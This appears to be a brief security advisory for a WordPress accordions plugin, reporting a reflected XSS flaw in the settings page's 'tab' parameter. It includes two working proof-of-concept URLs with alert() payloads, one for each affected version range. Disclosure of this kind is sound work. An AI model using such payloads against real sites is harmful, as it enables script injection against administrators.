The tab GET parameter of the settings page is not sanitised or escaped when being output back in an HTML attribute, leading to a reflected XSS issue.
v < 2.2.29
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a%22%3E%3Csvg%2Fonload%3Dalert%28123%29%3B%2F%2F%3E%3C%22
v < 2.2.30
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a"+onfocus%3Dalert(%2FXSS%2F)+autofocus%3Dautofocus+b%3D